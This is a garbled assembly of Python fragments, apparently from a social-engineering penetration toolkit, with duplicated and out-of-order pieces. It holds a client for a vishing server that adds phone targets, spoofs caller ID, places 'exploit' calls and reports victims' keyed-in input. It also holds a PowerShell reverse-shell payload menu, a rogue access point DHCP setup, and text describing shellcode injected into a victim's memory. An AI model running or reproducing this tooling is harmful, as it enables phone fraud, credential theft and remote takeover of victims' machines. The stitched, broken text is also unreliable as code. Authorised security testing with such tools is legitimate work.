def setupMenu(site): if debug: print ("Setup Menu") setup_menu = ['Add Target', 'Remove Target', 'List Targets', 'Default Spoofed Number Setting', 'Default Recording Setting', 'Exit Setup Menu'] exit = False while not exit: core.create_menu("\r\n==Phreakme Setup Menu==", setup_menu) setup_menu_choice = (raw_input(setprompt("0", ""))) if setup_menu_choice == "1": regex = False while not regex: new_number = raw_input("Enter a ten digit number to add to the target exploit list: ") if PHONE.match(new_number): new_number = str(new_number) regex = True post_url = site.url + "/service/setup/targets/" + new_number request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Number not added. Server error code received") else: getTargets(site) elif setup_menu_choice == "2": regex = False while not regex: del_number = raw_input("Enter a ten digit number to remove from the target exploit list: ") if PHONE.match(del_number): new_number = str(del_number) regex = True del_url = site.url + "/service/setup/targets/" + del_number request = requests.delete(del_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Number not removed. Server error code received") else: getTargets(site) elif setup_menu_choice == "3": getTargets(site) elif setup_menu_choice == "4": spoofMenu(site) elif setup_menu_choice == "5": recordingsMenu(site) elif setup_menu_choice == "6": exit = True
def main(): printBanner() with warnings.catch_warnings(): warnings.simplefilter("ignore") valid_ip = False phreak_menu = ['Setup PhreakMe Server URL', 'Setup', 'Exploit', 'Reporting', 'Exit'] site = siteData("") # site.url = "" site.auth = False site.user = "" site.passwd = "" site.certverify = False exit = False while not exit: try: core.create_menu("\r\n==PhreakMe Menu==", phreak_menu) if not site.url: print_warning (" Make sure to enter a PhreakMe Server URL before selecting other options!") phreak_menu_choice = (raw_input(setprompt("0", ""))) if phreak_menu_choice == "1": getURL(site) elif phreak_menu_choice == "2": setupMenu(site) elif phreak_menu_choice == "3": exploitMenu(site) elif phreak_menu_choice == "4": reportingMenu(site) elif phreak_menu_choice == "5": exit = True elif phreak_menu_choice == "hugs": print_warning("***********************************\r\n") print_warning("Hugs Are Now Mandatory \o/ \r\n") print_warning("***********************************\r\n") elif phreak_menu_choice == "banner": printBanner() else: print_warning ("Did you not get enough hugs as a child? Follow directions and enter a valid selection.\r\n") except (KeyboardInterrupt): exit = True pause=raw_input("\r\n\r\nExiting Phreakme - press [enter] to return to SET main menu") return
def spoofMenu(site): if debug: print ("Default Spoofing Number Setup Menu") setup_menu = ['Set Default Spoofing Number', 'Display Current Spoofing Number', 'Exit Spoofing Number Menu'] exit = False while not exit: core.create_menu("\r\n==Default Spoofing Number Setup Menu==", setup_menu) setup_menu_choice = (raw_input(setprompt("0", ""))) if setup_menu_choice == "1": spoof_number = None regex = False while not regex: spoof_number = raw_input("Enter a ten digit number to use for spoofed calls: ") if PHONE.match(spoof_number): spoof_number = str(spoof_number) regex = True spoof_name = None regex = False while not regex: spoof_name = raw_input("Enter a caller name up to 15 chars in case your trunking provider supports setting CNAM (though many don't): ") pat = re.compile("^[a-zA-Z0-9 ]{1,15}$") if pat.match(spoof_name): spoof_name = str(spoof_name) regex = True post_url = site.url + "/service/setup/globalcid/" + spoof_number + " <" + spoof_name + ">" if debug: print ("Sending spoofed number request: " + post_url) request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Default spoofing number not set. Server error code received") else: getSpoofedNum(site) elif setup_menu_choice == "2": getSpoofedNum(site) elif setup_menu_choice == "3": exit = True
def exploitMenu(site): if debug: print ("Exploit Menu") exploit_menu = ['Exploit Single Target', 'Exploit All Targets', 'Exit Exploit Menu'] exit = False while not exit: core.create_menu("\r\n==Exploit Selection Menu==", exploit_menu) exploit_menu_choice = (raw_input(setprompt("0", ""))) if exploit_menu_choice == "1": regex = False while not regex: exp_number = raw_input("Enter a ten digit number to exploit: ") if PHONE.match(exp_number): exp_number = str(exp_number) regex = True regex = False while not regex: cid_number = raw_input("Enter a ten digit number to spoof: ") if PHONE.match(cid_number): cid_number = str(cid_number) regex = True get_url = site.url + "/service/exploit/" + exp_number + "/" + cid_number request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Exploit command failed. Server error code received") else: print ("\r\nMaking the call, please wait a sec... \r\n") elif exploit_menu_choice == "2": post_url = site.url + "/service/exploit/all" request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Exploit All command failed. Server error code received") else: print ("\r\nMaking the calls, please wait a sec... \r\n") elif exploit_menu_choice == "3": exit = True
def recordingsMenu(site): setup_menu = ['Display Current Recording', 'List Available Recordings', 'Select Default Recording for Calls', 'Exit Recording Menu'] recording = None exit = False while not exit: core.create_menu("\r\n==Recording Setup Menu==", setup_menu) setup_menu_choice = (raw_input(setprompt("0", ""))) if setup_menu_choice == "1": recording = currentRecording(site, recording) if recording: print("\r\nThe current recording in use for all calls is: " + recording + "\r\n") else: print_warning("\r\nThere is no current recording found. Please set one.\r\n") if setup_menu_choice == "2": recordingsList(site) if setup_menu_choice == "3": selection = None recordingsList(site) regex = False while not selection: selection = raw_input("Enter the number of the recording you wish to use and hit <Enter>: ") pat = re.compile("^[1-3]{1}$") if pat.match(selection): selection = str(selection) regex = True post_url = site.url + "/service/setup/recordings/" + selection request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Default spoofing number not set. Server error code received") else: print("Recording selection " + selection + " saved.\r\n") if setup_menu_choice == "4": exit = True
import shutil import subprocess import src.core.setcore as core from src.core.menu import text # Py2/3 compatibility # Python3 renamed raw_input to input try: input = raw_input except NameError: pass core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5) show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu) powershell_menu_choice = input(core.setprompt(["29"], "")) if powershell_menu_choice != "99": # specify ipaddress of reverse listener #ipaddr = core.grab_ipaddress() ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ") core.update_options("IPADDR=" + ipaddr) # if we select alphanumeric shellcode if powershell_menu_choice == "1": port = input(core.setprompt(["29"], "Enter the port for the reverse [443]")) if not port: port = "443" core.update_options("PORT=" + port) core.update_options("POWERSHELL_SOLO=ON")
dhcp_config2 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.100 192.168.10.254; option domain-name-servers 8.8.8.8; option routers 192.168.10.1; option broadcast-address 192.168.10.255; default-lease-time 600; max-lease-time 7200; } """) dhcptun = None show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu) fakeap_dhcp_menu_choice = input(core.setprompt(["8"], "")) if fakeap_dhcp_menu_choice != "": fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2) # convert it to a string fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice) else: fakeap_dhcp_menu_choice = "1" if fakeap_dhcp_menu_choice == "1": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config1)
dhcp_config2 = (""" ddns-update-style none; authoritative; log-facility local7; subnet 192.168.10.0 netmask 255.255.255.0 { range 192.168.10.100 192.168.10.254; option domain-name-servers 8.8.8.8; option routers 192.168.10.1; option broadcast-address 192.168.10.255; default-lease-time 600; max-lease-time 7200; } """) dhcptun = None show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu) fakeap_dhcp_menu_choice = input(core.setprompt(["8"], "")) if fakeap_dhcp_menu_choice != "": fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2) # convert it to a string fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice) else: fakeap_dhcp_menu_choice = "1" if fakeap_dhcp_menu_choice == "1": # writes the dhcp server out core.print_status("Writing the dhcp configuration file to ~/.set") with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite: filewrite.write(dhcp_config1) dhcptun = 1
def reportingMenu(site): if debug: print ("Reporting Menu") reporting_menu = ['Calls With User Input', 'Calls With No User Input Received', 'Archive Call Data', 'Delete Call Data', 'Exit Reporting Menu'] exit = False while not exit: core.create_menu("\r\n==Reporting Menu==", reporting_menu) reporting_menu_choice = (raw_input(setprompt("0", ""))) if reporting_menu_choice == "1": get_url = site.url + "/service/report" request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if debug: print(request.text) if request.status_code != requests.codes.ok: print_warning("** Report data retrieval failed. Server error code received") request_json = json.loads(request.text) if debug: print(request_json) if len(request_json) > 0: print("\r\n************************************************") print("Date and Time Number Dialed User Input") print("************************************************") for i in range (0, len(request_json)): if request_json[i]['Input']: print(request_json[i]['Created'] + " " + request_json[i]['Dialed'] + " " + request_json[i]['Input']) print("************************************************\r\n") else: print("\r\nNo call data found ...\r\n") if reporting_menu_choice == "2": get_url = site.url + "/service/report" request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code != requests.codes.ok: print_warning("** Report data retrieval failed. Server error code received") request_json = json.loads(request.text) if debug: print(request_json) if len(request_json) > 0: print("\r\n************************************************") print("Date and Time Number Dialed") print("************************************************") for i in range (0, len(request_json)): if not request_json[i]['Input']: print(request_json[i]['Created'] + " " + request_json[i]['Dialed']) print("************************************************\r\n") else: print("\r\nNo call data found ...\r\n") if reporting_menu_choice == "3": post_url = site.url + "/service/report/delete" print_warning("WARNING: This option will archive data on the PhreakMe server. CLI access on the server is required to recover data.") warning_input = raw_input("Proceed with data archive? (Y/N)[N]: ") if warning_input.lower() == "y": request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code == requests.codes.ok: print("** Report data archived") else: print("** Report archive failed. Server error code received") else: print("\r\nData archive skipped ...\r\n") if reporting_menu_choice == "4": post_url = site.url + "/service/report/delete/noarchive" print_warning("WARNING: This option will permanently DELETE report data on the PhreakMe server.") warning_input = raw_input("Proceed with data delete? (Y/N)[N]: ") if warning_input.lower() == "y": request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify) if request.status_code == requests.codes.ok: print("** Report data deleted") else: print("** Report delete failed. Server error code received") else: print("\r\nData delete skipped...\r\n") elif reporting_menu_choice == "5": exit = True
place it onto a victim machine through hex to binary conversion via powershell. After the conversion takes place, Alphanumeric shellcode will then be injected straight into memory and the stager created and shot back to you. """) # if we dont detect metasploit if not os.path.isfile(msf_path): sys.exit("\n[!] Your no gangster... Metasploit not detected, check set_config.\n") # if we hit here we are good since msfvenom is installed ################################################### # USER INPUT: SHOW PAYLOAD MENU 2 # ################################################### show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2) payload = (input(core.setprompt(["14"], ""))) if payload == "exit": core.exit_set() # if its default then select meterpreter if payload == "": payload = "2" # assign the right payload payload = ms_payload(payload) # if we're downloading and executing a file url = "" port = ""
After the conversion takes place, Alphanumeric shellcode will then be injected straight into memory and the stager created and shot back to you. """) # if we dont detect metasploit if not os.path.isfile(msf_path): sys.exit( "\n[!] Your no gangster... Metasploit not detected, check set_config.\n" ) # if we hit here we are good since msfvenom is installed ################################################### # USER INPUT: SHOW PAYLOAD MENU 2 # ################################################### show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2) payload = (input(core.setprompt(["14"], ""))) if payload == "exit": core.exit_set() # if its default then select meterpreter if payload == "": payload = "2" # assign the right payload payload = ms_payload(payload) # if we're downloading and executing a file url = "" port = ""